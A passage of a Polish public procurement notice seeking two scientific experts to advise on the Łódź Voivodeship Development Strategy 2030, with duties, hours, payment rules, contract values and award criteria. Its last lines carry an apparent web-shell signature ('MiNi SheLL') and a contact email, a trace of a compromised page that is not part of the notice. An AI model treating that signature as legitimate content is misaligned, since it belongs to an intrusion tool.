dyskusji oraz komentowanie uwag zgłaszanych podczas spotkania. Każdy z ekspertów przeznaczy przeciętnie po 6 godzin na przygotowanie merytoryczne oraz przeprowadzenie 4 debat strategicznych (łącznie 24 godziny na przygotowanie i udział w 4 spotkaniach RFT).4.	dokumentowania faktycznego czasu pracy przeznaczonego na realizację zadań wymienionych w pkt. III.1-4. Udokumentowana (za pomocą formularza czasu pracy - załącznik 6) liczba faktycznie przepracowanych godzin stanowi podstawę naliczenia wartości wynagrodzenia każdego z Ekspertów, wypłacanego w cyklu miesięcznym, zgodnie z przyjętą stawką godzinową brutto. Obowiązkiem ekspertów jest wykazanie faktycznego czasu pracy przeznaczonego realizację zadań wskazanych w punktach III.1-4, których łączny wymiar nie przekroczy 160 godzin. Faktyczny czas pracy rozumie się jako: (1) czas obecności i aktywnego udziału w spotkaniach roboczych, prowadzenia debat strategicznych podczas RFT. Nieobecność Ekspertów na ustalonym spotkaniu wiąże się z brakiem możliwości rozliczenia czasu spotkania. Nieobecność Eksperta na wszystkich spotkaniach w danym miesiącu (nieusprawiedliwiona) może skutkować zmniejszeniem wartości wynagrodzenia brutto wypłaconego w kolejnym miesiącu o 2% jego wartości. W przypadku braku uczestnictwa (nieobecności nieusprawiedliwionej) w pracach nad Strategią przez 2 kolejne miesiące, Zamawiający zastrzega sobie prawo odstąpienia od umowy z przyczyn leżących po stronie Wykonawcy.(2) czas przeznaczony na opracowanie uwag, opinii, materiałów, treści merytorycznych na spotkania. Elementem dokumentacji czasu pracy związanej z wykonywaniem zadań w ramach zamówienia przez każdego Ekspertów są, w zależności od potrzeb Zamawiającego, uwagi szczegółowe (komentarze do tekstu w formie dymków, w trybie rejestruj zmiany), pisemne opinie, materiały i teksty merytoryczne przekazane Zamawiającemu w formie elektronicznej. Eksperci powinni pozostawać w stałym kontakcie (telefonicznym, e-mailowym oraz osobistym) z Zamawiającym.W przypadku braku porozumienia podczas realizacji przedmiotu zamówienia Zamawiający ma głos decydujący.VI. HARMONOGRAM REALIZACJI ZAMÓWIENIACałkowity czas realizacji zamówienia dla każdego z Ekspertów to 160 godzin udziału w spotkaniach (w tym w 4 spotkaniach RFT) w okresie od podpisania umowy (prawdopodobnie luty 2019 r.) do 31.12.2019 roku. Ramowy harmonogram zadań zamieszczono w tabeli 1. Uszczegółowienie ramowego harmonogramu realizacji zamówienia będzie wynikać z toku prac nad projektem Strategii i może podlegać modyfikacjom. O ww. modyfikacjach Wykonawca zostanie niezwłocznie powiadomiony. Wykonawca zobowiązany jest przyjąć wskazane przez Zamawiającego modyfikacje. Modyfikacje nie skutkują zmianą całkowitej liczby godzin objętych harmonogramem.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>85312320-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 42480,00<br/>Waluta: <br/>złp<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Autorstwo, współautorstwo lub redakcja publikacji naukowych</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Członkostwo w zespole autorskim</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Liczba godzin dodatkowych konsultacji</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Ekspert 2</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Świadczenie usług doradztwa eksperckiego przy opracowaniu Strategii Rozwoju Województwa Łódzkiego 2030I. UZASADNIENIE REALIZACJI ZAMÓWIENIAPotrzeba opracowania Strategii Województwa Łódzkiego 2030 wynika ze zmian przyszłej polityki spójności Unii Europejskiej, jak również zbliżającego się zakończenia okresu, którego dotyczy obecna Strategia Rozwoju Województwa Łódzkiego 2020. Ponadto konieczne jest zapewnie spójności strategii regionalnej z zapisami aktualizowanych krajowych dokumentów strategicznych, w tym w szczególności Krajowej Strategii Rozwoju Regionalnego 2030 oraz przyjętego w październiku 2018 r. Uchwałą Rady Ministrów Systemu Zarządzania Rozwojem Polski. System ten zakłada sporządzanie zintegrowanych dokumentów zarządzania polityką rozwoju na wszystkich szczeblach: krajowym, regionalnym i lokalnym. Zapewnienie wszechstronnego i obiektywnego procesu tworzenia Strategii wymaga wsparcia zespołu opracowującego projekt Strategii przez zewnętrznych, niezależnych ekspertów naukowych. Wyłonieni w przedmiotowym postępowaniu eksperci muszą osobiście uczestniczyć w pracach zgodnie z niżej opisanym harmonogramem (dotyczy zadania nr: 1 i 2).II. PRZEDMIOT ZAMÓWIENIARealizacja zamówienia będzie polegała na wykonaniu dwóch zadań. Jeden Wykonawca może złożyć ofertę tylko na jedno zadanie.Zadanie IIRealizacja Zadania II będzie polegała na świadczeniu usług doradztwa na każdym etapie opracowywania Strategii Rozwoju Województwa Łódzkiego 2030 przez Eksperta posiadającego wiedzę w zakresie zarządzania strategicznego, strategii rozwoju miast i regionów, planowania zintegrowanego na poziomie regionalnym, ewaluacji (Ekspert 2).Do obowiązków Eksperta 2 będzie należał:1)	Współudział w przygotowaniu metodyki opracowania Strategii, w tym m. in. wyborze metod i technik badawczych oraz narzędzi analitycznych służących opracowaniu diagnozy.2)	Współudział w przygotowaniu części diagnostycznej Strategii obejmującej: (1) analizę uwarunkowań zewnętrznych oraz trendów rozwojowych o charakterze krajowym, europejskim i globalnym, (2) analizę uwarunkowań wewnętrznych, diagnozę sytuacji społecznej, gospodarczej i przestrzennej województwa wraz z wyznaczeniem obszarów koncentracji diagnozowanych zagadnień, (3) analizę trendów i prognoz rozwojowych województwa w okresie objętym strategią, (4) analizę strategiczną (5) określenie wyzwań rozwojowych z ich terytorializacją;3)	Współudział w określeniu wizji rozwoju regionu.4)	Współudział w określeniu celów i kierunków działań wraz z ich terytorializacją.5)	Współudział w określeniu i delimitacji Obszarów Strategicznej Interwencji.6)	Współudział w określeniu systemu realizacji Strategii, w tym programów wdrożeniowych oraz ram i narzędzi finansowych realizacji Strategii.7)	Współudział w stworzeniu systemu monitorowania i ewaluacji Strategii.8)	Współudział w przygotowaniu i prowadzeniu debat strategicznych w ramach RFT.III. ZADANIA WYKONAWCÓWWykonawcy przedmiotu zamówienia (Ekspert nr 1 i Ekspert nr 2) są zobowiązaniu do:1.	osobistego udziału w 17 spotkaniach konsultacyjnych Zespołu opracowującego projekt SRWŁ 2020, w siedzibie Zamawiającego, w godzinach pracy Biura, średnio po 4 godziny (łącznie 68 godzin w ramach spotkań konsultacyjnych). Poza obligatoryjnym uczestnictwem w spotkaniach konsultacyjnych, dopuszcza się realizację doradztwa drogą elektroniczną (e-mail, wideokonferencja, telekonferencja). 2.	przygotowywania uwag, opiniowania elementów składowych projektu Strategii oraz opracowywania materiałów na spotkania konsultacyjne. Forma i zakres sporządzanych przez Ekspertów uwag, opinii i innych dokumentów przygotowywanych na spotkania konsultacyjne będzie każdorazowo ustalana z Zamawiającym poprzez e-mail. Na pracę merytoryczną związaną z przygotowaniem ww. dokumentów każdy z Ekspertów przeznaczy średnio po 4 godziny przed każdym z 17 spotkań (łącznie 68 godzin na przygotowanie merytoryczne).3.	współudziału w przygotowaniu merytorycznym i przeprowadzeniu debat strategicznych w ramach 4 spotkań Regionalnego Forum Terytorialnego (RFT). Przygotowanie merytoryczne rozumie się jako współudział w określeniu zakresu tematycznego spotkania RFT oraz w opracowaniu treści merytorycznej wystąpień. Prowadzenie debat rozumie się jako przedstawienie wyników kolejnych etapów prac, moderowanie dyskusji oraz komentowanie uwag zgłaszanych podczas spotkania. Każdy z ekspertów przeznaczy przeciętnie po 6 godzin na przygotowanie merytoryczne oraz przeprowadzenie 4 debat strategicznych (łącznie 24 godziny na przygotowanie i udział w 4 spotkaniach RFT).4.	dokumentowania faktycznego czasu pracy przeznaczonego na realizację zadań wymienionych w pkt. III.1-4. Udokumentowana (za pomocą formularza czasu pracy - załącznik 6) liczba faktycznie przepracowanych godzin stanowi podstawę naliczenia wartości wynagrodzenia każdego z Ekspertów, wypłacanego w cyklu miesięcznym, zgodnie z przyjętą stawką godzinową brutto. Obowiązkiem ekspertów jest wykazanie faktycznego czasu pracy przeznaczonego realizację zadań wskazanych w punktach III.1-4, których łączny wymiar nie przekroczy 160 godzin. Faktyczny czas pracy rozumie się jako: (1) czas obecności i aktywnego udziału w spotkaniach roboczych, prowadzenia debat strategicznych podczas RFT. Nieobecność Ekspertów na ustalonym spotkaniu wiąże się z brakiem możliwości rozliczenia czasu spotkania. Nieobecność Eksperta na wszystkich spotkaniach w danym miesiącu (nieusprawiedliwiona) może skutkować zmniejszeniem wartości wynagrodzenia brutto wypłaconego w kolejnym miesiącu o 2% jego wartości. W przypadku braku uczestnictwa (nieobecności nieusprawiedliwionej) w pracach nad Strategią przez 2 kolejne miesiące, Zamawiający zastrzega sobie prawo odstąpienia od umowy z przyczyn leżących po stronie Wykonawcy.(2) czas przeznaczony na opracowanie uwag, opinii, materiałów, treści merytorycznych na spotkania. Elementem dokumentacji czasu pracy związanej z wykonywaniem zadań w ramach zamówienia przez każdego Ekspertów są, w zależności od potrzeb Zamawiającego, uwagi szczegółowe (komentarze do tekstu w formie dymków, w trybie rejestruj zmiany), pisemne opinie, materiały i teksty merytoryczne przekazane Zamawiającemu w formie elektronicznej. Eksperci powinni pozostawać w stałym kontakcie (telefonicznym, e-mailowym oraz osobistym) z Zamawiającym.W przypadku braku porozumienia podczas realizacji przedmiotu zamówienia Zamawiający ma głos decydujący.VI. HARMONOGRAM REALIZACJI ZAMÓWIENIACałkowity czas realizacji zamówienia dla każdego z Ekspertów to 160 godzin udziału w spotkaniach (w tym w 4 spotkaniach RFT) w okresie od podpisania umowy (prawdopodobnie luty 2019 r.) do 31.12.2019 roku. Ramowy harmonogram zadań zamieszczono w tabeli 1. Uszczegółowienie ramowego harmonogramu realizacji zamówienia będzie wynikać z toku prac nad projektem Strategii i może podlegać modyfikacjom. O ww. modyfikacjach Wykonawca zostanie niezwłocznie powiadomiony. Wykonawca zobowiązany jest przyjąć wskazane przez Zamawiającego modyfikacje. Modyfikacje nie skutkują zmianą całkowitej liczby godzin objętych harmonogramem.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>85312320-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 44867,00<br/>Waluta: <br/>złp<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Autorstwo, współautorstwo lub redakcja publikacji naukowych</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Członkostwo w zespole autorskim</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Liczba godzin dodatkowych konsultacji</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com